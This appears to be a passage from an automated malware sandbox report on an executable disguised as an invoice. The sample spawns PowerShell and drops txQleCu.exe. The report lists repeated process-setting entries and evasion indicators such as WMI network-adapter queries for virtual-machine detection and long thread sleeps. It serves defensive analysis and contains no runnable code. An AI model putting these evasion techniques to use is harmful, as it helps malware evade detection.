                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 6880Thread sleep time: -41202s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 6948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 6052Thread sleep time: -41202s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 6004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 1920Thread sleep count: 1858 > 30Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99858s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99732s >= -30000sJump to behavior
